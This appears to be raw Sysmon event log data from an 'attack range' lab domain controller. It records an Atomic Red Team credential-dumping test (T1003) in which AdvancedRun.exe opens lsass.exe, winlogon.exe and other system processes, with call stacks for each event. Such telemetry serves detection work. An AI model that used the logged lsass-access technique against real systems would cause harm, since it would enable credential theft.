17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003952208Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003952207Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952206Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952205Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003952203Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952202Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952201Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952200Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952199Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952198Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 534500x80000000000000003952197Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003952196Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952195Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003952194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003952193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-ED47-61EA-7803-000000002702}4916412C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:39.323{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003952189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.323{834264DD-DAE7-61EA-1700-000000002702}13001460C:\Windows\System32\svchost.exe{834264DD-ED47-61EA-7903-000000002702}1108C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT 
